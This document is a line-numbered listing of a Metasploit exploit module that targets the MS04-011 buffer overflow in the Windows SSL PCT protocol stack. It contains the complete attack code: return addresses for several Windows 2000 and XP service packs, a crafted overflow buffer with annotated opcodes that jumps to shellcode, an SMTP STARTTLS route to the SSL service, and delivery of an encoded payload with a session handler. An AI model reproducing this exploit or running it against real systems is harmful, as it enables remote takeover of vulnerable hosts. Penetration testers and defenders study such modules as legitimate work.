Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'MS04-011 Microsoft Private Communications Transport Overflow',
14
      'Description'    => %q{
15
          This module exploits a buffer overflow in the Microsoft
16
        Windows SSL PCT protocol stack. This code is based on Johnny
17
        Cyberpunk's THC release and has been tested against Windows
18
        2000 and Windows XP. To use this module, specify the remote
19
        port of any SSL service, or the port and protocol of an
20
        application that uses SSL. The only application protocol
21
        supported at this time is SMTP. You only have one chance to
22
        select the correct target, if you are attacking IIS, you may
23
        want to try one of the other exploits first (WebDAV). If
24
        WebDAV does not work, this more than likely means that this
25
        is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
26
        5.1). Using the wrong target may not result in an immediate
27
        crash of the remote system.
28
      },
29
      'Author'         => [ 'hdm' ],
30
      'License'        => MSF_LICENSE,
31
      'References'     =>
32
        [
33
          [ 'CVE', '2003-0719'],
34
          [ 'OSVDB', '5250'],
35
          [ 'BID', '10116'],
36
          [ 'MSB', 'MS04-011'],
37

38
        ],
39
      'Privileged'     => true,
40
      'DefaultOptions' =>
41
        {
42
          'EXITFUNC' => 'thread',
43
        },
44
      'Payload'        =>
45
        {
46
          'Space'    => 1800,
47
          'BadChars' => "",
48
          'StackAdjustment' => -3500,
49
        },
50
      'Platform' => 'win',
51
      'Targets'        =>
52
        [
53
          [
54
            'Windows 2000 SP4',
55
            {
56
              'Platform' => 'win',
57
              'Ret'      => 0x67419ce8, # jmp [esp + 0x6c]
58
            },
59
          ],
60
          [
61
            'Windows 2000 SP3',
62
            {
63
              'Platform' => 'win',
64
              'Ret'      => 0x67419e1d, # jmp [esp + 0x6c]
65
            },
66
          ],
67
          [
68
            'Windows 2000 SP2',
69
            {
70
              'Platform' => 'win',
71
              'Ret'      => 0x6741a426, # jmp [esp + 0x6c]
72
            },
73
          ],
74
          [
75
            'Windows 2000 SP1',
76
            {
77
              'Platform' => 'win',
78
              'Ret'      => 0x77e4f44d, # jmp [ebx + 0x14]
79
            },
80
          ],
81
          [
82
            'Windows 2000 SP0',
83
            {
84
              'Platform' => 'win',
85
              'Ret'      => 0x7658a6cb, # jmp [ebx + 0x0e]
86
            },
87
          ],
88
          [
89
            'Windows XP SP0',
90
            {
91
              'Platform' => 'win',
92
              'Ret'      => 0x0ffb7de9, # jmp [esp + 0x6c]
93
            },
94
          ],
95
          [
96
            'Windows XP SP1',
97
            {
98
              'Platform' => 'win',
99
              'Ret'      => 0x0ffb832f, # jmp [esp + 0x6c]
100
            },
101
          ],
102
        ],
103
      'DisclosureDate' => '2004-04-13',
104
      'DefaultTarget' => 0))
105

106
    register_options(
107
      [
108
        OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"])
109
      ])
110
  end
111

112
  def exploit
113
    begin
114
      connect
115
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e
116
      print_error("Cannot connect: #{e.message}")
117
      return
118
    end
119

120
    print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...")
121

122
    # This is a heap ptr to the ssl request
123
    # ... and just happens to not die ...
124
    # Thanks to CORE and Halvar
125
    #
126
    #   80620101     =>  and byte ptr [esi+1], 0x2
127
    #   bd00010001   =>  mov ebp, 0x1000100
128
    #   0016         =>  add [esi], dl
129
    #   8f8201000000 =>  pop [esi+1]
130
    #   eb0f         =>  jmp short 11 to shellcode
131

132
    buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
133
      "\xeb\x0f" + 'XXXXXXXXXXX' +
134
      [target.ret ^ 0xffffffff].pack('V')+
135
      payload.encoded
136

137
    # Connect to a SMTP service, call STARTTLS
138
    if (datastore['PROTO'] == 'smtp')
139
      begin
140
        greeting = sock.get_once
141
      rescue ::EOFError => e
142
        print_error("Failed to receive data for the protocol greeting: #{e.message}")
143
        return
144
      end
145

146
      begin
147
        sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
148
        resp = sock.get_once
149
      rescue ::Timeout::Error
150
        print_error("Timedout while sending HELO")
151
        return
152
      rescue ::EOFError => e
153
        print_error("Failed to receive a response for HELO: #{e.message}")
154
        return
155
      end
156

157
      begin
158
        sock.put("STARTTLS\r\n")
159
        resp = sock.get_once
160
      rescue ::Timeout::Error
161
        print_error("Timed out while sending STARTTLS")
162
        return
163
      rescue ::EOFError => e
164
        print_error("Failed to receive a response for STARTTLS: #{e.message}")
165
        return
166
      end
167

168
      if (resp and resp !~ /^220/)
169
        print_warning("Warning: this server may not support STARTTLS")
170
      end
171
    end
172

173

174
    begin
175
      sock.put(buf)
176
      resp = sock.get_once
177
    rescue ::Timeout::Error => e
178
      print_error("Timed out while sending the malicious data")
179
      return
180
    rescue ::EOFError => e
181
      print_error("Failed to receive a response after the malicious data: #{e.message}")
182
      return
183
    end
184

185
    if (resp == "\x00\x00\x01")
186
      print_status("The response indicates that the PCT protocol is disabled")
187
    end
188

189
    handler
190
    disconnect
191
  end
192
end
193

194